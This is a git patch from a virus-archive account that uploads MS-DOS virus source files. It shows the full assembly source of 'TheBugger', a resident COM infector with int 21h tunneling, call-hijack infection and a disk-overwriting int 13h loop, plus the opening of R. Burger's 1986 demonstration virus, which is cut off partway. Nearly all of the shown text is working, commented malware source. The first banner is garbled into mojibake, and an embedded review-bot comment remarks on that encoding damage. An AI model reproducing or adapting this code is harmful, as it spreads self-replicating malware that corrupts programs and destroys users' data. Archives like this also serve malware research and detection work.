From 99a7802ac0022730429f483110f6da0c8da4f7c3 Mon Sep 17 00:00:00 2001 
From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 17:34:47 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.bugger.asm | 537 +++++ MSDOS/Virus.MSDOS.Unknown.burger.asm | 340 +++ MSDOS/Virus.MSDOS.Unknown.bush.asm | 413 ++++ MSDOS/Virus.MSDOS.Unknown.busted.asm | 225 ++ MSDOS/Virus.MSDOS.Unknown.bypass.asm | 220 ++ MSDOS/Virus.MSDOS.Unknown.byteme.asm | 281 +++ MSDOS/Virus.MSDOS.Unknown.c-623.asm | 319 +++ MSDOS/Virus.MSDOS.Unknown.c-627.asm | 330 +++ MSDOS/Virus.MSDOS.Unknown.c-740.asm | 127 ++ MSDOS/Virus.MSDOS.Unknown.c-740b.asm | 127 ++ MSDOS/Virus.MSDOS.Unknown.c-847.asm | 149 ++ MSDOS/Virus.MSDOS.Unknown.c-a-d.asm | 431 ++++ MSDOS/Virus.MSDOS.Unknown.c0t.asm | 26 + MSDOS/Virus.MSDOS.Unknown.cabanas.asm | 2638 +++++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.cache.asm | 255 +++ MSDOS/Virus.MSDOS.Unknown.cacodmon.asm | 336 +++ MSDOS/Virus.MSDOS.Unknown.caffein.asm | 213 ++ MSDOS/Virus.MSDOS.Unknown.cancer.asm | 128 ++ MSDOS/Virus.MSDOS.Unknown.cannab1.asm | 231 ++ MSDOS/Virus.MSDOS.Unknown.cannab2.asm | 278 +++ MSDOS/Virus.MSDOS.Unknown.cannab2.txt | 278 +++ MSDOS/Virus.MSDOS.Unknown.cannab3.asm | 280 +++ MSDOS/Virus.MSDOS.Unknown.cannab3i.asm | 280 +++ MSDOS/Virus.MSDOS.Unknown.cannab4.asm | 264 +++ MSDOS/Virus.MSDOS.Unknown.carbunc.asm | 244 +++ MSDOS/Virus.MSDOS.Unknown.caroevil.asm | 323 +++ MSDOS/Virus.MSDOS.Unknown.carpdiem.asm | 292 +++ MSDOS/Virus.MSDOS.Unknown.carpe.asm | 293 +++ MSDOS/Virus.MSDOS.Unknown.cascade.asm | 1188 ++++++++++ MSDOS/Virus.MSDOS.Unknown.cascspec.asm | 1183 ++++++++++ MSDOS/Virus.MSDOS.Unknown.casino.asm | 1428 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.casper.asm | 776 +++++++ MSDOS/Virus.MSDOS.Unknown.catchme.asm | 138 ++ MSDOS/Virus.MSDOS.Unknown.catphish.asm | 552 +++++ MSDOS/Virus.MSDOS.Unknown.catphish1.asm | 675 ++++++ MSDOS/Virus.MSDOS.Unknown.cclust2.asm | 279 +++ MSDOS/Virus.MSDOS.Unknown.cdeath3.asm | 631 ++++++ MSDOS/Virus.MSDOS.Unknown.cdeath4.asm | 602 
++++++ MSDOS/Virus.MSDOS.Unknown.cdeath5.asm | 605 ++++++ MSDOS/Virus.MSDOS.Unknown.cdiem2.asm | 847 ++++++++ MSDOS/Virus.MSDOS.Unknown.cdset.asm | 487 +++++ MSDOS/Virus.MSDOS.Unknown.cdset4.asm | 655 ++++++ MSDOS/Virus.MSDOS.Unknown.cdset5.asm | 661 ++++++ MSDOS/Virus.MSDOS.Unknown.cdset6.asm | 631 ++++++ MSDOS/Virus.MSDOS.Unknown.cemetary.asm | 737 +++++++ MSDOS/Virus.MSDOS.Unknown.cerebus.asm | 703 ++++++ MSDOS/Virus.MSDOS.Unknown.cgagrafa.asm | 182 ++ MSDOS/Virus.MSDOS.Unknown.chad.asm | 205 ++ MSDOS/Virus.MSDOS.Unknown.chaos.nfo | 26 + MSDOS/Virus.MSDOS.Unknown.charly2.asm | 637 ++++++ MSDOS/Virus.MSDOS.Unknown.chc.asm | 87 + MSDOS/Virus.MSDOS.Unknown.chchoke.asm | 58 + MSDOS/Virus.MSDOS.Unknown.cheeba.asm | 857 ++++++++ MSDOS/Virus.MSDOS.Unknown.cheeser.asm | 416 ++++ MSDOS/Virus.MSDOS.Unknown.cheesy.asm | 186 ++ MSDOS/Virus.MSDOS.Unknown.cia.asm | 241 +++ MSDOS/Virus.MSDOS.Unknown.cia2.asm | 247 +++ MSDOS/Virus.MSDOS.Unknown.ciavirus.asm | 239 ++ MSDOS/Virus.MSDOS.Unknown.cih.txt | 1165 ++++++++++ MSDOS/Virus.MSDOS.Unknown.cih15.asm | 1402 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih15_2.asm | 1402 ++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_12.asm | 1480 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm | 1480 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_13.asm | 1490 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cih_14.asm | 1533 +++++++++++++ MSDOS/Virus.MSDOS.Unknown.cint.asm | 226 ++ MSDOS/Virus.MSDOS.Unknown.civil.asm | 569 +++++ MSDOS/Virus.MSDOS.Unknown.civil210.asm | 363 ++++ MSDOS/Virus.MSDOS.Unknown.civil211.asm | 303 +++ MSDOS/Virus.MSDOS.Unknown.civil310.asm | 476 ++++ MSDOS/Virus.MSDOS.Unknown.civil510.asm | 337 +++ MSDOS/Virus.MSDOS.Unknown.civil_4a.asm | 190 ++ MSDOS/Virus.MSDOS.Unknown.civil_4b.asm | 196 ++ MSDOS/Virus.MSDOS.Unknown.civil_4c.asm | 197 ++ MSDOS/Virus.MSDOS.Unknown.civil_4d.asm | 201 ++ MSDOS/Virus.MSDOS.Unknown.civil_ii.asm | 308 +++ MSDOS/Virus.MSDOS.Unknown.civilser.asm | 569 +++++ MSDOS/Virus.MSDOS.Unknown.civilwar.asm | 303 +++ 
MSDOS/Virus.MSDOS.Unknown.cj.asm | 588 +++++ MSDOS/Virus.MSDOS.Unknown.clap.asm | 195 ++ MSDOS/Virus.MSDOS.Unknown.clust.asm | 259 +++ MSDOS/Virus.MSDOS.Unknown.cluster1.asm | 176 ++ MSDOS/Virus.MSDOS.Unknown.cluster2.asm | 249 +++ MSDOS/Virus.MSDOS.Unknown.cocroach.asm | 336 +++ MSDOS/Virus.MSDOS.Unknown.codezero.asm | 381 ++++ MSDOS/Virus.MSDOS.Unknown.coffshop.asm | 1662 ++++++++++++++ MSDOS/Virus.MSDOS.Unknown.coffshp1.asm | 825 +++++++ MSDOS/Virus.MSDOS.Unknown.coffshp3.asm | 1674 ++++++++++++++ MSDOS/Virus.MSDOS.Unknown.coke.asm | 280 +++ MSDOS/Virus.MSDOS.Unknown.collectn.txt | 26 + MSDOS/Virus.MSDOS.Unknown.combat.asm | 142 ++ MSDOS/Virus.MSDOS.Unknown.comdex7.asm | 805 +++++++ MSDOS/Virus.MSDOS.Unknown.comment1.asm | 334 +++ MSDOS/Virus.MSDOS.Unknown.comment2.asm | 334 +++ MSDOS/Virus.MSDOS.Unknown.compiler.asm | 312 +++ MSDOS/Virus.MSDOS.Unknown.compo.asm | 616 ++++++ MSDOS/Virus.MSDOS.Unknown.compres.asm | 224 ++ MSDOS/Virus.MSDOS.Unknown.comvirus.asm | 458 ++++ MSDOS/Virus.MSDOS.Unknown.copcom.asm | 103 + 99 files changed, 50186 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.bugger.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.burger.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.bush.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.busted.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.bypass.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.byteme.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-623.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-627.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-740.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-740b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-847.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c-a-d.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.c0t.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cabanas.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cache.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cacodmon.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.caffein.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cancer.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab2.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab3i.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cannab4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.carbunc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.caroevil.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.carpdiem.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.carpe.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cascade.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cascspec.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.casino.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.casper.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.catchme.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.catphish.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.catphish1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cclust2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdeath3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdeath4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdeath5.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdiem2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset5.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cdset6.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cemetary.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cerebus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cgagrafa.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.chad.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.chaos.nfo create mode 100644 MSDOS/Virus.MSDOS.Unknown.charly2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.chc.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.chchoke.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cheeba.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cheeser.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cheesy.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cia.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cia2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ciavirus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih.txt create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih15.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih15_2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_12.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_12_2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_13.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cih_14.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cint.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil210.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil211.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil310.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil510.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4c.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_4d.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civil_ii.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civilser.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.civilwar.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cj.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.clap.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.clust.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cluster1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cluster2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.cocroach.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.codezero.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.coffshop.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.coffshp1.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.coffshp3.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.coke.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.collectn.txt
create mode 100644 MSDOS/Virus.MSDOS.Unknown.combat.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.comdex7.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.comment1.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.comment2.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.compiler.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.compo.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.compres.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.comvirus.asm
create mode 100644 MSDOS/Virus.MSDOS.Unknown.copcom.asm
diff --git a/MSDOS/Virus.MSDOS.Unknown.bugger.asm b/MSDOS/Virus.MSDOS.Unknown.bugger.asm
new file mode 100644
index 00000000..c9e350c6
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.bugger.asm
@@ -0,0 +1,537 @@ +;北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北 +;北 北 +;北 痧痧痧 痧 痧 痧痧 痧痧 痧 痧 痧痧 痧痧 痧痧 痧痧 北 +;北 痧 痧痧 痧= == 痧 痧 痧 痧 痧= 痧 北 +;北 痧 痧 痧 痧 痧 痧 痧 痧 痧 痧 痧 痧痧 北 +;北 痧 痧 痧 痧痧 痧痧 痧痧 痧痧 痧痧 痧痧 痧 VIRUS. 北 +;北 北 +;北  A 29A Research Code by The Slug.  北 +;北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北 +;北 TheBugger is a simple COM infector with some interesting 北 +;北 inprovements. 北 +;北 北 +;北 Its first difference with a normal COM virus is the tricky resident 北 +;北 check; it's designed to avoid lamers writing the typical resident 北 +;北 program wich returns the residency code and forces the virus to not 北 +;北 install in memory. To avoid that, the virus makes an extra check of 北 +;北 a random byte in the memory copy; if the check fails, it jumps to a 北 +;北 simulated HD formatting routine }:). 北 +;北 北 +;北 Another interesting feature is the tunneling routine. It uses the 北 +;北 common code trace method but it starts tracing from PSP call to int 北 +;北 21h instead of doing it from normal int 21h vector in order to avoid 北 +;北 resident antivirus stopping trace mode. This call is supported for 北 +;北 compatibility with older DOS versions and it has some little 北 +;北 diferences with the normal int 21 handler: first, the function code 北 +;北 is passed in cl register (not in ah as usual) and second, the 北 +;北 function to call can't be higher than 24h. These diferences are 北 +;北 handled by the O.S. in a separated routine and then it jumps to the 北 +;北 original int 21h handler, so the tunneling routine only skips the 北 +;北 first 'compatibility' routines and gets the real int 21h address :).北 +;北 北 +;北 The last big feature, is the infection method; the virus infects COM 北 +;北 files by changing a call in host code to point to it. This call may 北 +;北 be one between the second and fifth. This is done by intercepting 北 +;北 the int 21h service 4bh (exec), when a COM file is executed, the vi- 北 +;北 rus changes its first word with an int CDh call, it intercepts this 北 +;北 int and jumps to the int 21h. 
When the host starts running, it exe- 北 +;北 cutes the int CDh and then the virus takes control; it restores host 北 +;北 first word and changes int 01h to trace host in order to find a call 北 +;北 to infect }:) The use of int CDh can be avoided by tracing int 21h 北 +;北 until host code, but this way we have the same problem of resident 北 +;北 antivirus. 北 +;北 北 +;北 And that's all folks :), enjoy it. 北 +;北 北 +;北 9  北 +;北 The Slug/29A };){|0D==8北 +;北 I Love This Job. 3--------北 +;北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北北 + +.286 +code segment 'TheBugger' +assume cs:code,ds:code,ss:code +org 0h + +virsize equ (virend-start)+1 + +;北北北北北北北北北北北北北北北 Main C0de 北北北北北北北北北北北北北北北北北 + +start: push cs ;address t0 return t0 h0st. + db 68h ;push '0ffset'. + retonno dw 0000 + + push ds es + pusha + + call sig ;get nasty delta 0ffset. +sig: pop si + sub si, offset(sig) + + mov ax, 0B0B0h ;resident check. + int 21h + cmp ax, 0BABAh + jne instal + jmp lstchk + +instal: mov ah, 62h ;get PSP segment. + int 21h + xchg bx,ax ;get MCB addres. + dec ax + mov ds,ax + + cmp byte ptr ds:[0],'Z' ;is the last MCB? + je chgmcb + jmp aprog + +chgmcb: sub word ptr ds:[3],(virsize/10h)+8 ;change bl0ck size in MCB + sub word ptr ds:[12h],(virsize/10h)+8 ;& in PSP. + add ax,ds:[3] + inc ax + + cld ;copy to new l0cati0n. + mov es, ax + xor di, di + push cs + pop ds + mov cx, virsize + rep movsb + + push es ;jump t0 c0py. + push offset(newcpy) + retf + +newcpy: mov si, 06h ;m0ve call t0 int 21, + lea di, PSPcall+1 ;fr0m PSP t0 c0py 0f virus. + movsw + movsw + + mov ds, cx ;save curent int 21h vect0r. + mov si,21h*4 ;) cx=0 + lea di,int21+1 + movsw + movsw + + mov word ptr ds:[01h*4], offset(tunn) ;hang tunneling code :) + mov word ptr ds:[01h*4]+2, es + + pushf ;call int 21h fr0m PSP in trace m0de. + pop ax + or ah, 01h + push ax + mov cl, 0Bh ;get input status function (in cl ;). + popf + call PSPcall + + mov word ptr [si-4], offset(hdl21) ;hang new int 21h handler. 
+ mov word ptr [si-2], es + +aprog: popa ;return t0 h0st. + pop es ds + retf + +lstchk: in ax, 40h ;check rand0m w0rd of mem0ry c0py. + and ax, 0200h + push si + add si, ax + mov di, ax + cmpsw + pop si + je aprog + +buuuhh: push cs ;display funny message :) + pop ds + lea dx, joke + add dx, si + mov ah,09h + int 21h + + mov dx,0180h ;I think it's clear enought };). + mov cx,07FFh +funny: mov ax,0401h + int 13h + loop funny + +;北北北北北北北北北北北北北北北北 Data 北北北北北北北北北北北北北北北北北北 + +credits db 'TheBugger virus by The Slug/29A' +intCD: int 0CDh ;int t0 detect h0st execution. +PSPcall: db 9Ah + dd 0 ;PSP call t0 int21h ;) +joke db 'Removing virus from memory...',13,10,'$' + +;北北北北北北北北北北北北北北 Int 21h Handler 北北北北北北北北北北北北北北北 + +hdl21: cmp ax, 0B0B0h ;resident service? + jne func2 + mov ax,0BABAh + push cs ;return virus segment in es + pop es ;f0r extra check. + iret + +func2: cmp ax, 4B00h ;exec service? + je exec + +int21: db 0EAh ;jmp t0 int 21h. + dd 0 + +exec: push ds es + pusha + pushf + + mov si, dx ;c0py filespec. + push cs + pop es + lea di, path +next: lodsb + stosb + cmp al, 0 + jne next + + sub si, 4 ;is a .c0m file? + lodsw + xor ax, 2020h + cmp ax, 'oc' + jne nocom + + call chgattr ;change file attributes. + + mov ax, 3D02h ;0pen file. + int 03h + xchg bx, ax + + call getdate ;get file time & date. + + lea dx, firstb ;read first 3 bytes 0f file + mov cx, 3 ;t0 exe check & h0st detect rutine. + mov ah, 3Fh + int 03h + + cmp word ptr cs:firstb, 'ZM' ;is an exe file (MZ sign)? + je exit + + xor cx, cx ;g0 t0 file start again. + mov ax, 4200h + cwd ;dx <- 0 ;) + int 03h + + lea dx, intCD ;write 'int CDh' c0de 0n file start + mov cx, 2 ;t0 detect h0st execution. + mov ah, 40h + int 03h + + + xor ax, ax ;change int CDh vect0r + mov es, ax ;f0r h0st detection. + mov ax, es:[0CDh*4] + mov intcddes, ax + mov ax, es:[0CDh*4]+2 + mov intcdseg, ax + mov es:[0CDh*4], offset(fndhst) + mov es:[0CDh*4]+2, cs + +exit: mov ah, 3Eh ;cl0se file. 
+ int 03h + +nocom: popf + popa + pop es ds + jmp int21 + +;北北北北北北北北北北北北北 First Int 01 Handler 北北北北北北北北北北北北北 + +tunn: push ds es bp ;trace int 21 f0r tunneling. + pusha + + call getret ;get next instructi0n address in es:di. + + cmp es:[di], 0FC80h ;is an 'cmp ax, ??' + jne fuera + cmp byte ptr es:[di+2], 24h ;avoid 'cmp ax, 24h' + je fuera + +stop: xor bx, bx + mov es, bx + mov es:[03h*4], di ;make int 03h point to true int 21h ;) + mov es:[03h*4]+2, ax + + lodsw ;trace m0de 0ff. + and ah, 0FEh + mov [si-2], ax + +fuera: popa + pop bp es ds + iret + +;北北北北北北北北北北北北北北 Int CDh Handler 北北北北北北北北北北北北北北北 + +fndhst: push ds es bp ;detect h0st c0de at exec. + pusha + + call getret ;get next instructi0n dir. + +chkhst: cmp di, 102h ;ensure it's h0st start :) + jne nohost + + push cs + pop ds + + mov ax, word ptr firstb ;rest0re first h0st w0rd in mem0ry. + dec di + dec di + stosw + + lea dx, path ;0pen file. + push dx + mov ax, 3D02h + int 21h + xchg bx, ax + + lea dx, firstb ;rest0re first w0rd 0f file. + mov cx, 2 + mov ah, 40h + int 21h + + call setdate ;rest0re file date & time. + mov ah ,3Eh ;cl0se file. + int 21h + pop dx + call setattr ;rest0re file attributes. + + xor ax, ax ;rest0re int CDh vect0r. + mov es, ax + mov ax, intcddes + mov es:[0CDh*4], ax + mov ax, intcdseg + mov es:[0CDh*4]+2, ax + + + mov word ptr es:[01h*4], offset(fndcal) ;change int 01h vect0r + mov es:[01h*4]+2, cs ;t0 find a call. + + mov numinstr, 0FFh ;max number 0f instr. t0 trace. + + in ax, 40h ;ramd0m ch0se 0f call t0 infect (2-5). + and al, 03h + inc al + inc al + mov numcall, al + + push ss ;rest0re 0riginal IP (100h) 0n stack. + pop ds + dec di + dec di + mov [si-4], di + + lodsw ;trace m0de 0n + or ah, 01h + mov ss:[si-2], ax + +nohost: popa + pop bp es ds + iret + +;北北北北北北北北北北北北北 Second Int 01 Handler 北北北北北北北北北北北北北 + +fndcal: push ds es bp ;trace h0st t0 find a call t0 infect. + pusha + + dec cs:numinstr ;check instructi0n trace limit. 
+ jnz goon + jmp off + +goon: call getret ;get ret address. + + cmp di, cs:lstdsp ;d0 n0t c0unt 0ne m0re instructi0n + jne norep ;0n 'rep' prefixed instructi0ns. + inc cs:numinstr + +norep: mov cs:lstdsp, di ;st0re actual return 0ffset. + + mov ax, es:[di] + + cmp al, 9Dh ;check f0r a p0pf. + jne chkirt + lodsw + lodsw + or ah, 01h ;ensure trap flag will be 0n. + mov [si-2], ax + jmp nocall + +chkirt: cmp al, 0CFh ;check f0r a iret. + jne chkint + lodsw + lodsw + lodsw + lodsw + or ah, 01h ;ensure trap flag will be 0n. + mov [si-2], ax +anocall:jmp nocall + +chkint: cmp al, 0CDh ;check f0r a int xx. + jne chkint3 + cmp ah, 20h ;skip ints 20h, 21h & 20h + je anocall + cmp ah, 21h + je anocall + cmp ah, 27h + je anocall + + mov cs:numint, ax ;int number t0 perf0rm call. + + inc di ;inc ret addr t0 step 0ver int call. + inc di + mov [si-4], di + + popa + pop bp es ds + numint dw 00 ;perf0rm int call in virus c0de. + iret + +chkint3:cmp al, 0CCh ;check int 03h call. + jne chkcal + inc di + mov [si-4], di ;step 0ver int call. + jmp nocall + +chkcal: cmp al, 0E8h ;check f0r a call t0 infect. + je found + jmp nocall + +found: dec cs:numcall ;it's the nice 0ne ;) + je go + cmp cs:numinstr, 20 ;d0n't be s0 extrict in call number + jb go ;if there are t00 few calls. + jmp nocall + +go: call chgattr ;change attributes. + + mov ax, 3D02h ;0pen file. + int 03h + xchg bx, ax + + call getdate ;get file date & time. + + xor cx, cx ;m0ve t0 file call positi0n. + mov dx, di + sub dx, 100h + mov ax, 4200h + int 03h + + lea dx, check ;read call fr0m file f0r c0mpress chk. + mov cx, 1 + mov ah, 3Fh + int 03h + + cmp check, 0E8h ;c0mpressed file? + je ok + jmp close + +ok: xor cx, cx ;m0ves t0 end 0f file. + mov ax, 4202h + cwd ;dx <- 0 ;) + int 03h + mov hostsize, ax + + sub ax, di ;find call parameter. + add ax, 0FDh + mov hostsize, ax ;f0r a new "call hostsize". 
+ + mov ax, es:[di+1] ;0ffset t0 return t0 h0st + add ax, di + add ax, 3 + mov retonno, ax + + lea dx, start ;save mi c0de at file end. + mov cx, virsize + mov ah, 40h + int 03h + + xor cx, cx ;m0ves again t0 call. + sub di, 0FFh + mov dx, di + mov ax, 4200h + int 03h + + lea dx, hostsize ;change it. }:) + mov cx, 2 + mov ah, 40h + int 03h + +close: call setdate ;rest0re file time & date. + + mov ah, 3Eh ;cl0se file. + int 03h + + lea dx, path + call setattr ;rest0re file attributes. + +off: mov bp, sp + mov ax, ss:[bp+26] ;trace m0de 0ff. + and ah, 0FEh + mov ss:[bp+26], ax + +nocall: popa + pop bp es ds + iret + +;北北北北北北北北北北北 Get Ret Address Fr0m Stack 北北北北北北北北北北北北 + +getret: mov si, sp ;get next instructi0n dir. + add si, 24 + push ss + pop ds + lodsw + mov di, ax + lodsw + mov es, ax + ret + +;北北北北北北北北北北北北 S0me File Handling C0de 北北北北北北北北北北北北北 + +chgattr:push cs + pop ds + lea dx, path + mov ax,4300h ;change file attributes. + int 03h + mov attrib,cx + xor cx, cx ;reset file atributes. + mov ax,4301h + int 03h + ret + +setattr:mov cx, attrib ;rest0re file attributes. + mov ax,4301h + int 03h + ret + +getdate:mov ax,5700h ;get file time & date. + int 03h + mov time,cx + mov date,dx + ret + +setdate:mov cx,time ;rest0re file time & date. + mov dx,date + mov ax,5701h + int 03h + ret +virend: + +;北北北北北北北北北北北北北北 Virtual Data 北北北北北北北北北北北北北北北北 + +firstb db 3 dup(0) ;buffer f0r h0st start. +lstdsp dw 0 ;last trace 0ffset. +numinstr db 0 ;max. number 0f instructi0ns t0 trace. +numcall db 0 ;call t0 infect (2-5). +intcddes dw 0 ;int CD vect0r backup. +intcdseg dw 0 +hostsize dw 0 ;it's just the h0st size ;) +attrib dw 0 ;file attributes. +time dw 0 ;file time. +date dw 0 ;file date. +check db 0 ;check f0r compressed file. +path db 0 ;path to host. + +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.burger.asm b/MSDOS/Virus.MSDOS.Unknown.burger.asm new file mode 100644 index 00000000..2081ef42 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.burger.asm 
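Review bot: The banner comment that opens this file (the `;` lines at the top of the hunk, up to the `.286` directive) looks like CP437 box-drawing bytes that were decoded as a double-byte code page during upload, so it now reads as runs of `北` and `痧` and the text inside the frame is partly unreadable. Since this commit is an archival upload, the file should be added as its original bytes, or transcoded once from CP437 to UTF-8 so the frame characters survive, rather than committed in this mixed state; the burger.asm and bush.asm hunks in the same commit are plain ASCII and are not affected. The `.txt` and `.nfo` entries in the diffstat (e.g. cannab2.asm and cannab2.txt, both listed at 278 lines) may be the same sample stored twice and are worth checking for duplicates before the archive grows further.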
@@ -0,0 +1,340 @@ +; Program Virus Ver.: 1.1 +; Copyright by R. Burger 1986 +; This is a demonstration program for computer +; viruses. It has the ability to replicate itself, +; and thereby modify other programs +; +; Added A86 v3.22 compatibility 15 Dec 1991 +; command line: a86 burger.asm burger.com +D +; Copyright (C) 1991 ==[ CyberZone ]== Jon A Johnson + +page 70,120 +Name BURGER +code segment + assume cs:code +progr equ 100h + org progr + +; The three NOP's serve as the marker byte of the +; virus which allow it to identify a virus. + +MAIN: + nop + nop + nop + +; Initialize the pointers + + mov ax,00 + mov es:[pointer],ax + mov es:[counter],ax + mov es:[disks],al + +; Get the selected drive + + mov ah,19h ; drive? + int 21h + +; Get the current path on the current drive + + mov cs:drive,al ; save drive + mov ah,47h ; dir? + mov dh,0 + add al,1 + mov dl,al ; in actual drive + lea si,cs:old_path + int 21h + +; Get the number of drives present +; If only one drive is present, the pointer for +; search order will be set to search order + 6 + + mov ah,0eh ; how many disks + mov dl,0 + int 21h + mov al,01 + cmp al,01 ; one drive? + jnz hups3 + mov al,06 + +hups3: + mov ah,0 + lea bx,search_order + add bx,ax + add bx,0001h + mov cs:pointer,bx + clc + +; Carry is set, if no more .COM's are found. +; Then, to avoid unnecessary work, .EXE files will +; be renamed to .COM files and infected. +; This causes the error message "Program too large +; to fit in memory" when starting larger infected +; .EXE programs. + +change_disk: + jnc no_name_change + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + cmp al,0ffh + jnz no_name_change ; .EXE found? + +; If neither .COM nor .EXE is found, then sectors will +; be overwritten depending on the system time in +; milliseconds. This is the time of the complete +; "infection" of a storage medium. The virus can find +; nothing more to infect and starts its destruction. 
